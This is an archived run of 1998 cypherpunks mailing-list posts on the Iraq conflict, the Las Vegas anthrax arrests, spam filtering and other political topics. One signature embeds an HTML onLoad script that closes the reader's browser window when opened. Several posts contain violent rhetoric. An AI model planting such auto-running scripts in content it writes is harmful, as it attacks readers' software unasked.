   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 14:43:36 +0800
To: "Eric J. Tune" <cypherpunks@cyberpass.net
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <3.0.5.32.19980219204255.007c3680@pop3.lvcablemodem.com>
Message-ID: <3.0.5.32.19980220212147.008be2a0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>What the world needs now is not another mass killing of Iraqis by the
>>United States government.  What the world really needs now is a fifty
>>dollar weapon that sinks aircraft carriers.

The Stinger missile and the bazooka have been a good start, letting 
local defenders stop the expensive tools of attacking armies.

At 08:42 PM 2/19/98 -0800, Eric J. Tune wrote:
>>> These soldiers went where they were ordered to go, as befits a soldier,
>>> and tried to do the job they were given and accomplish the mission, and
>>> for that EVERY ONE OF THEM DESERVES Y O U R RESPECT.  I am quite sure
>>> the vast majority of them thought it was patently stupid to go to
>>> Somalia in the first place, but a soldier follows orders, legal ones,
>>> and tries to get the job done regardless of personal feelings.

Following stupid orders gets your fellow soldiers killed stupidly.
Following immoral orders gets your fellow soldiers killed, and gets the 
opposing soldiers killed, and gets the civilian collateral damage killed,
and the fact that you're following orders doesn't absolve you of guilt.
Once you're in the war, you're also fighting to keep your buddies from
getting killed, and to keep from getting killed yourself, and if the
orders are tactically correct and sacrifice you and your buddies as
the price of an overall victory, that's the price of being a soldier.
But if you shouldn't be there, you shouldn't be there, no matter how
competent and brave and patriotic you're being while you're there.
Most soldiers I've known believe in following orders, and the politicians
who send them there pull out all the stops to keep them believing it.

>Listen up jerk, in case you didn't get any news during 1990, Iraq attacked
>Kuwait, and murdered thousands of Kuwaitis. ... America would have never
>been involved if Iraq hadn't invaded Kuwait.  

Yeah?  In 1980, Iraq attacked Iran, and the US sold them weapons,
and Saddam was Reagan & Bush's good buddy and ally.  And in 1990
when Saddam was talking with the US Ambassador about their border problem,
she said the US had no interest in such a purely local problem.
OK, it wasn't like we had to twist Saddam's arm to get him to invade;
he is a militarist asshole - but in 1980 that was a Good Thing.
And in 19{pick a number} Israel invaded South Lebanon - Good Thing Too!

Is it possible that it's got a lot more to do with US Foreign policy
or geopolitical interests?  Or about the fact that the US Military-
Industrial Complex was severely threatened by the lack of Commies?
Or just partly because George Bush's Neilsen ratings were down
and he'd had good results invading Panama?  Or that the Ayatollah
had gotten rid of one of America's favorite dictators in Iran
just a year or two before (even though he disliked Commies too)?
Or because the US Army wanted to make sure everybody knows that
they can kick anybody's ass, anywhere, anytime?

In the process of demolishing Iraq, Bush's army killed hundreds of
thousands of civilians, demolishing much of the civilian infrastructure
for safe drinking water (which probably killed more people than
the bombing did), as well as killing tens of thousands of
draftee soldiers.  If the objective had been to get rid of Saddam,
a couple dozen good Mossad agents or Green Berets could have
taken him out quickly and efficiently.  That wasn't the objective.

> I don't think air strikes are the answer to this, and I think 
> Clinton is a moron for his present policy,

He's a sleaze, but no moron - his objectives are maintaining his own
political influence, which he's very good at, as opposed to doing
anything positive for the Kuwaitis or Iraqis or Americans....

>Evidently, you again know nothing of what the Iraqis did to the Kuwaitis on
>their way in to Kuwait.  Get educated, shithead. 
Probably about like what they did to the Iranians or what the
Israelis did to the South Lebanese, except that it was Bad instead of Good.

>To everyone else besides Cordian who reads this, my apologies, but for all
>it's failings, I still have pride in America... ...not for all the foreign
>policy bullshit or the way the government fucks us over, or starts wars, or
>sticks their collective nose in other countries business...but for the fact
>that as a whole people, Americans still keep trying, everyday, to be a
>better people. I'm proud of that.

I agree.  And telling the government to stop initiating wars and trying
to get the people not to jump in line behind a propaganda bandwagon
are a good part of trying to be a better people.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 1998 11:39:06 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Pensacola Police have lost their mind!! (fwd)
In-Reply-To: <199802210309.VAA27046@einstein.ssz.com>
Message-ID: <199802210406.XAA08800@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199802210309.VAA27046@einstein.ssz.com>, on 02/20/98 
   at 09:09 PM, Jim Choate <ravage@ssz.com> said:

>Their story was that the child had a behavioral problem and the parents
>refused to get counceling when the school requested. She apparently goes
>on room smashing temper tantrums on a regular basis. The father of the
>child said it was the most ludicrous thing he had ever heard of,
>reportedly.

Well sounds like we are getting some CYA spindoctoring going on now that
there is National Attention. None of the early reports had any mention of
a cronic behavior problem. I posted the article from our local paper in a
seperate post.

>Can't say that changes the situation a heck of a lot though...

No not at all. We have some serious problems with the County Sherifs
Department down here.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>
 
Tag-O-Matic: If Windows sucked it would be good for something.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO49e49Co1n+aLhhAQExhgP/S1zh7YQr0RRa9V3n7jMZnNZ8MJwCWVS5
lQAA7NPiWoZpGrD2LmWzA9QRCA+j0P7EnLzPT4o4e3h5Gby3z3PKv+xNtvZC0JY6
8h9DPqbz7m0V2l3RQnZXwopiDTVfO+//7G2x2x5V1QjKjouYBPnqhdTVfMglAtzF
ZI4gCQEL2MU=
=GvPe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 11:26:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Anthrax suspect predicts attack on US [CNN]
Message-ID: <199802210335.VAA27136@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: http:--www.cnn.com-US-9802-20-anthrax.arrests-

>                MAN SUSPECTED OF HAVING ANTHRAX PREDICTED ATTACK
>        
>      February 20, 1998
>      Web posted at: 10:15 p.m. EST (0315 GMT)
>      
>      LAS VEGAS, Nevada (CNN) -- A man arrested on charges of possessing
>      what is believed to be the deadly toxin anthrax predicted on a radio
>      talk show the day before his arrest that the United States would be
>      the target of a major biological attack within two years.
>      
>      Tuesday, Larry Wayne Harris, speaking on Talk America Radio
>      Network's "The Buck Stops Here," gave a detailed description of what
>      he said was a plot involving more than 200 "sleeper cells" of Iraqi
>      students poised to unleash anthrax and bubonic plague bacteria on
>      the American people.
>      
>      "The odds of us making it through even the end of this century
>      without a major biological incident are very low," Harris said.
>      
>      Harris, 46, and William Leavitt Jr., 47, were arrested Wednesday
>      night in a Las Vegas suburb after an informant called the FBI to
>      report the two men told him they had anthrax. They are being held at
>      the Clark County Detention Center.
>      
>      Laboratory test results to determine whether a substance seized was
>      in fact anthrax were delayed Friday. No reason was given. 
>      
>   Leavitt's attorney: Tests will be negative
>   
>      
>      
>      Leavitt's attorney, Lamond Mills, said in an interview with CNN in
>      Las Vegas he believes the tests will prove negative.
>      
>      "On Monday, I think the test results will be in and show that it's
>      non-toxic, and they're going to have to stand up and acknowledge
>      that. And their case is going to be flushed," Mills said.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 14:43:08 +0800
To: "Attila T. Hun" <paladin@lvcablemodem.com>
Subject: Re: putting down the US military
In-Reply-To: <3.0.5.32.19980219140712.007bda40@pop3.lvcablemodem.com>
Message-ID: <3.0.5.32.19980220214430.008be9a0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>PEOPLE DIED IN SOMALIA, including a personal friend of mine. 
>> They were all somebody's son, brother, and friend  [snip]
>    my oldest son's LAR recon/black unit had been stood down for
>    Somalia, gear turned in, etc.  
...
>    how do you think the all the families with sons, husbands,
>    lovers, siblings, etc. felt with the spectacle of a dead

Sorry to hear about your friend, and I'm glad your son got back.
A friend of mine lives in Somalia about half the time,
except when his wife's tribe's over in Ethiopia.  They've been through
years of civil war, in a society that until the colonialists
took over was extremely free and relatively peaceful (for a bunch of 
semi-nomadic cattle herders armed to the teeth like pre-industrial Swiss;
they tend to have occasional short armed squabbles when the
normal social structures for peacefully resolving differences fail)
and the wars for control of the post-colonial government have
made it impossible for their economy to do well during drought.

Michael's friends were quite pleased at kicking the UN's butts,
and at kicking the US Army's butts, but they thought that even
if there hadn't been a civil war going on, the idea of trying to 
disarm Somalis is blatantly foolish - you'd have better luck
trying to disarm an NRA convention, where people carry guns for fun
rather than to protect their families and livestock like Somalis.
After all, most NRA members believe in Nations and Governments;
Somalis believe in their families and tribes and the Law,
and any "leader" who expects blind obedience from his followers
quickly finds out that nobody's following him.

...
>    absolutely. misplaced criticism and a personal offense to me
>    as well as all other servicemen.

Sending US soldiers in to do a fool's errand like that should
offend you even more.   And telling a free people that they should
give up the guns they protect their families with because
the UN will take care of protecting them is an offense to them.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 11:40:25 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: On War, Legends, and Crypto (fwd)
Message-ID: <199802210345.VAA27317@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Feb 1998 22:31:16 -0500
> From: Anonymous <anon@anon.efga.org>
> Subject: Re: On War, Legends, and Crypto (fwd)

> I was suggesting that when finding oneself in a conflict with LEOs, it is
> better to be in the position of a trainrobber hiding in a cave with a
> backdoor, rather than in the position of someone getting bombed in their
> house at Waco or Ruby Ridge.

True, but the Waco and Ruby Ridge incidents aren't equivalent. In neither
case were the people involved committing aggregious crimes nor were they
expecting to be attacked by massed forces.

I suspect that implicit with the premeditated train robbery is the
expectation of pursuit.

> You are always better off if you can show your opponent the futility of
> his goal.

I don't remember the date, but....

During the American Civil War, Lincoln and his wife were having dinner with
several other government and military persons. During the dinner a
discussion arose about the best way to end the war. After much discussion
and depracation of the South Lincoln spoke. The gist of his rebuttal was
that the *best* way to win a war was to make the enemy your friend.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 14:43:06 +0800
To: Tim May <whgiii@invweb.net>
Subject: Re: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"
In-Reply-To: <199802200032.TAA28422@users.invweb.net>
Message-ID: <3.0.5.32.19980220215127.008be2a0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:33 PM 2/19/98 -0800, Tim May wrote:
>At 2:55 PM -0800 2/19/98, William H. Geiger III wrote:
>>>She's a buffoon who is probably the first one who'll be sent to the wall
>>>if there's ever a Second American Revolution.
>>Third. We had a Second American Revolution and we lost.
>You're quite right...I stand corrected.
>
>Though in some sense it was a "secessionist movement," which is subtly
>different from a revolution. 

We've had bunches of local ones - Shay's Rebellion, the Whiskey Rebellion.
There was a big secession followed by a reconquest, but that wasn't
really a revolution.  There were a bunch of events like Wounded Knee
in which our conquered neighbors tried to fight back and lost.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 14:45:55 +0800
To: Declan McCullagh <ravage@ssz.com>
Subject: Re: Should the Feds ban spam? (fwd)
In-Reply-To: <199802151940.NAA25592@einstein.ssz.com>
Message-ID: <3.0.5.32.19980220221605.008be2a0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim wrote:
>>Absolutely they do, but the right is that *they* must do the filtering and
>>*not* the ISP (it's a business and doesn't have fundamental rights).

At 05:00 PM 2/15/98 -0500, Declan McCullagh wrote:
>1. No, they can delegate that authority to the ISP. This is part of the
>freedom to contract.

Yeah.  Netcom doesn't have the right to decide what I'm allowed to read,
but it can decide what materials that it will transmit, if it wants,
and I can decide whether to do business with them, if I want.
Two of the ISPs I use for receiving email offer spam-filtering services;
I'm not currently buying either of them, but if spam goes from
5% to 50% of my mail, I'll certainly consider it.
(And one of them gives a summary of what it's blocked, which is good.)
Ray Arachelian and Eric Blossom can't decide what messages on Cypherpunks 
I'm allowed to read, but they can offer the most interesting 5-10%
and maybe I'll use their editing capabilities instead of reading the
whole firehose myself.  (I alternate between FCPUNX and the full list.)

>2. People acting together have rights. A corporation is an artificial legal
>construct, but a necessary one, and it has rights. Think of The New York
>Times Co. and the First Amendment.

Corporations aren't a necessity, just a convenience; the big
law firms and accounting firms are all partnerships, and do just fine
without being corporations.  Corporations do have artificial rights,
but as constructs of the state, the state can decide which rights to
give them and which rights not to give them in return for the favor
of granting corporate charters.

But Jim should know better than to say that businesses don't have rights.
Businesses are activities that people engage in, either as individual
proprietors, or as contractors, or as partnerships, or as employees,
or as corporations.  One of my ISPs is a sole proprietor, though he's
now got an employee or two.  Doesn't diminish his rights any.
Another of my ISPs is a corporation; they're big and clumsy,
but I can still hire them to perform services for me, including
editing if I want to.


>>No true Libertarian would allow any 3rd party to censor or limit the
>>information available to them.  Such actions are fundamentally 
>>non-libertarian which believes in individual choice.

Nonsense - there's far more stuff written every day than you or I
have time to read; even on Usenet, I had to stop reading every
newsgroup sometime around 1984 (a few years before Henry Spencer stopped :-)
Depending on other people to find interesting stuff is necessary;
the question is how you pick your sources and filters,
and how much you trust them to tell you everything.

>>Oh really? It is clear from many examples that the press is not to be
>>trusted because of its interactions in past political and criminal episodes.

Of course they're not - do you think anybody actually believes everything 
they read or see on TV (well, yeah, there seem to be people who do :-)
If you want to be well-informed, you need lots of sources;
one of the cool things about the net is that you _can_ get
lots of information that seldom got through the official channels
before.  Some of it didn't get through because it didn't match
the political biases of the editors or newspaper corporate owners;
other stuff didn't get through because it was boring or bogus,
and if you're filtering all the news yourself, you'll need to
do your own guessing and fact-checking.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 21 Feb 1998 11:29:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: On War, Legends, and Crypto (fwd)
In-Reply-To: <199802201934.NAA24685@einstein.ssz.com>
Message-ID: <bfafa6c94b5ad933545a8c5eb1a87a11@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




> From the trainrobbers perspective this is certainly true. From the Sheriff's
> perspective it shows the futility of his job if his goal is to stop all
> crime.
> 
> Are the Cypherpunks here to rob trains or to keep trains from being robbed?


I was suggesting that when finding oneself in a conflict with LEOs, it is
better to be in the position of a trainrobber hiding in a cave with a
backdoor, rather than in the position of someone getting bombed in their
house at Waco or Ruby Ridge.

You are always better off if you can show your opponent the futility of
his goal.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 14:43:18 +0800
To: Declan McCullagh <ravage@ssz.com>
Subject: Re: Should the Feds ban spam? (fwd)
In-Reply-To: <199802152236.QAA26477@einstein.ssz.com>
Message-ID: <3.0.5.32.19980220223638.008be2a0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 16:36 -0600 2/15/98, Jim Choate wrote:
>>Newspaper editors work according to policies and trusts empowered by the
>>owners of the paper. They are allowed as a function of the views of the
>>owners to express that choice as an *employee* of those owners. Those
>>policies do not apply to the readers as would happen in the case of an ISP.
>>Unless you propose that each person should have multiple accounts at
>>multiple ISP's.

At 06:43 PM 2/15/98 -0500, Declan McCullagh wrote:
>This is so incoherent that it's not possible to turn into a positive statement.

I found it pretty easy to parse, though incorrect -
Jim assumes that each person will only deal with one ISP,
and that getting spam filtering from that ISP means turning
over control of all your incoming mail/news to the ISP.
It's a bad assumption (even if I'm mistaken in claiming Jim assumes it :-)
-- of course everybody should have multiple Internet service providers.
As a Silicon Valley geek, I deal with several different ISPs offering
dialup IP service, not counting my employer's dial and LAN access,
or Metricom if I get it, but for most people, that's an exception.

Dialup IP packet forwarding isn't the only service provided on the Net!
I subscribe to a bunch of mailing lists, 
and even if I used an ISP that provided filtering services, 
I'd expect it to leave the mailing list traffic alone 
(and expect some of the lists to try and reduce spam sent to the list.)  
I also use a couple of mail forwarders - I advertise pobox.com,
since it's convenient to have a permanent address even if I change ISPs.
Occasionally I'll use a nymserver if I want to keep separate
reputations, or an anonymous remailer for non-persistent or
non-replyable email services.  Pobox offers spam filtering,
and while I don't use it, I think it's the service that
gives you a summary of all the email it rejected if you want,
which makes it much more likely that I'd buy such a service.

I've found that almost all the mail I get addressed directly to 
my netcom address is spam (some of it's mail from real people 
with my old address, or mailing lists I haven't reconfigured yet.)
It's convenient to be able to tell, just as I know that
junk snailmail addressed to "Wired Stewart" is from the
subscription I had a few years ago...

I also have a couple of free services that I play with, and one 
of my cats has a Juno account she's been using to experiment 
with remailers on.   And for new people getting on the net,
it really makes sense to use hotmail or juno for a while
until you know what you're doing, so you don't have spam
following you around your whole life.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 12:45:20 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Some children are rabid and need to be put down (fwd)
Message-ID: <199802210451.WAA27987@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Feb 1998 20:30:43 -0800
> From: Tim May <tcmay@got.net>
> Subject: Some children are rabid and need to be put down

> I know that if a kid was throwing chairs at me I'd be tempted to throw a
> punch back...something that is strictly verboten. Lawsuits, criminal
> prosecution, never work in the school system again, that sort of verboten.

Let me get this straight, you would punch a 5 year old child?

Tim, you truly have my sympathy and I sincerely hope that someday you deal
with whatever it is that drives that sense of personal injustice and anger.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 21 Feb 1998 12:07:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: putting down the US military
Message-ID: <1.5.4.32.19980221040626.00742578@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



It's easy to fault the military as an organization, as easy as
with any other. Most of us have had enough experience with
them to know what Dilbert knows, even if we can't quip like
the master.

What's hard is to know the unexplainable of combat and
be unable to convey what it's like to those who haven't
had the peculiar disorientation of losing whatever ability 
you've ever had to tell the difference between living and 
dying.

No book or film or general has ever got right, nor any tale told 
by skulled out vets sober or not.

What's never told is what it's like to lose control of mind and
body for days weeks and months. Maybe it can't be told, 
can't be remembered, can't be related in normal ways of 
communicating. Maybe that's why some of the best war
stuff is created by those who've never been there.

Enduring an artillery barrage is beyond comprehension, your
body goes to pieces under the crushing sound and concussion,
and involuntary reactions overwhelm the normal controls of all
organs and orifices. Every part goes haywire, beyond stopping,
everybody on the scene can't help becoming beaten meat
flopping and scrambling to get underground, trying to scream
amidst god's loudest roar of thunder and screeching richocheting
metal.

Bombing is far worse than that.

Even the hit of high speed round will hydraulic-ram your blood into
parts of your carcass it was never meant to go, and your senses
go numb with shock, and nothing works, body or mind. And that's
before you become conscious enough to see the savagery the 
slug's done to your precious gut, arm, leg, crotch -- if it didn't
fly through your helmet and skull leaving you permanently
satisfied.

There's no way to get ready for the worst you'll ever experience
and wish you hadn't. Maybe that's why most vets forget what
they actually experienced and fall back on the tired and true lies
of war stories. Nobody could possibly believe the other if you
could manage to tell the truth, which I doubt anybody's got the
courage to do, to relive that, when every instinct of survival 
is to go blank.

Which is why you'll see now and then some who just sit and stare 
a long way past the horizon, like math geniuses in Princeton deep
thought.

Anyway, this has nothing to do with recruiting and patriotism 
which are about wholly believable war stories like you see
on tv and hear down at the lodge and bar.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 21 Feb 1998 13:26:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Some children are rabid and need to be put down
In-Reply-To: <v03102807b1140738ade7@[207.167.93.63]>
Message-ID: <199802210518.XAA03312@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May writes:

> And from what I've heard about this little girl, it's beginning to sound
> like she ought to be put down like a dog that can't stop biting. Or at
> least kicked out of the school completely...perhaps a reform school will
> straighten her out. 

In other Florida news, a 23 year old female daycare worker picked up a
kitchen knife and stabbed a mother to death, after the mother complained
that the worker had hit and pinched her 5 year old son. 

We don't really know what the counselor said or did to this 5 year old
girl before the biting started, and given the anti-youth bias of the
mainstream press, we are unlikely to find out.  Even if some horrendous
tale of harrassment by school staff emerges, it will simply be suggested
that they were "disciplining" her for her "behavior problem." 

Now she may have a legitimate problem, and may have started biting and
scratching in response to the counselor saying - "Good morning.  You look
lovely today." 

Then again.... 

It is rarely useful to take things like this at face value, especially
given the spin control talents of school administrators and the teachers
union.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 21 Feb 1998 13:28:06 +0800
To: cypherpunks@cyberpass.net
Subject: Jimbelling the Sheep
Message-ID: <199802210520.XAA03328@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



The FBI informant who orchestrated the capture of the recent "Anthrax
Terrorists" turns out to be a man twice convicted of felony extortion.
 
He presently markets something called "The AZ-58 Ray Tube Frequency
Instrument Prototype" which he advertises as being able to somehow
purify the body of bacteria and viruses.
 
Sounds like a rehash of Radionics.
 
You may view the contraption at its very own web site,
 
         http://home.sprynet.com/sprynet/jmckenzie
 
-----
 
 
LAS VEGAS (AP) -- Far from planning an anthrax attack, William Leavitt
Jr. was involved in a bizarre deal to buy a $2 million germ-killing
machine from an FBI informant who double-crossed him, Leavitt's
lawyers said Friday.
 
Leavitt was described by his attorneys as a well-meaning, if gullible
scientist.
 
He and Larry Wayne Harris, both microbiologists, were arrested in
suburban Henderson Wednesday outside a medical office and charged with
conspiracy to possess and possession of a biological agent.
 
His lawyers said Leavitt was operating under the assumption that what
Harris had was Anthrax vaccine, which is legal and safe.
 
The FBI was awaiting tests Friday to determine if it was vaccine or
material grade anthrax, which is potent enough to kill thousands of
people.
 
Leavitt is married with three children and runs his own
fire-protection business. The FBI says he also owns microbiological
laboratories in his hometown of Logandale, Nev., and Frankfurt,
Germany.
 
His criminal attorney, Lamond Mills, said the FBI's informant, Ronald
Rockwell, was trying to ``scam'' Leavitt into buying a germ-killing
machine.
 
``When he couldn't scam 'em, he went the other way. He became a good
guy for the FBI,'' Mills said.
 
Leavitt's business lawyer, Kirby Wells, said the machine was called
the AZ-58 Ray Tube Frequency Instrument Prototype, and was hyped by
Rockwell in glossy brochures as being able to flush the body clean of
bacteria and viruses.
 
``It looked like a bunch of bells and whistles,'' said Wells, who said
he saw a picture of the machine. ``What made my client believe there
was substance to that thing, I don't know. I wish I did.''
 
A promotion on the Internet has a bold headline: ``ANTHRAX,'' and goes
on to say the AZ-58 ``can treat large numbers of people at the same
time.''
 
``Has the greatest health discovery in history been suppressed?'' the
ad asks.
 
Leavitt was close to buying the machine in a $2 million deal, but
wanted to test it before making a $100,000 down-payment and arranged
to fly Harris to Las Vegas about a week ago to help, said Wells.
 
Leavitt believed that Harris was transporting anthrax vaccine, Mills
said. But Rockwell told the FBI that Leavitt described it as
military-grade.
 
On the''NBC Nightly News'' Friday, Rockwell reiterated that Leavitt
and Harris said they had military grade anthrax.
 
``They lied on what they were going to do,'' Rockwell said. ``It
scared me so bad.''
 
There is no phone listing for Rockwell in the Las Vegas area. His
attorney has not returned calls to The Associated Press.
 
Leavitt and Harris were arrested Wednesday night after the FBI, with
Rockwell's help, tailed the men to a medical office in suburban
Henderson. Authorities removed a cooler and petri dishes from the
office, and sealed the men's beige Mercedes in plastic before
transporting it to an Air Force base.
 
Leavitt, 47, and Harris, 46, of Lancaster, Ohio, are being held
without bond.
 
In an affidavit, the FBI said described Rockwell as a cancer research
scientist who was convicted of felony extortion in 1981 and 1982. But
the FBI has vouched for his credibility, saying he came forward
without getting a deal and was a ``citizen performing his civic
duty.''
 
Harris' attorney, Michael Kennedy, said Thursday that Rockwell's
credibility ``is something we're going to look into.''
 
It was unclear how Leavitt, a Mormon bishop with strong political
ties, got hooked up with Harris, an alleged white supremacist who has
been plugging his self-published book about germ warfare.
 
The FBI has said Harris met Rockwell last summer at a Denver science
conference, while Leavitt's attorneys said they believed Rockwell got
the men together.
 
Mills said the results of the FBI tests will determine if they remain
united in their defense. ``If the tests come back non-toxin, there is
no case,'' said Mills. ``If it comes back military grade, then whoa,
time out, that's not our fault. We separate from (Harris)
completely.''

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 13:19:08 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: 2killo pounds of explosives stolen [CNN]
Message-ID: <199802210524.XAA28243@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                2,000 POUNDS OF EXPLOSIVES STOLEN IN PENNSYLVANIA
>                                        
>      February 20, 1998
>      Web posted at: 9:20 p.m. EST (0220 GMT)
>      
>      SLIGO, Pennsylvania (CNN) -- A coal company in Pennsylvania told the
>      federal Bureau of Alcohol, Tobacco and Firearms Friday that 2,000
>      pounds of mining explosives have been stolen.
>      
>      The explosives were taken from the C&K Coal Co. on February 16, and
>      authorities are offering a $5,000 reward for information leading to
>      the arrest of those responsible.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 21 Feb 1998 12:31:43 +0800
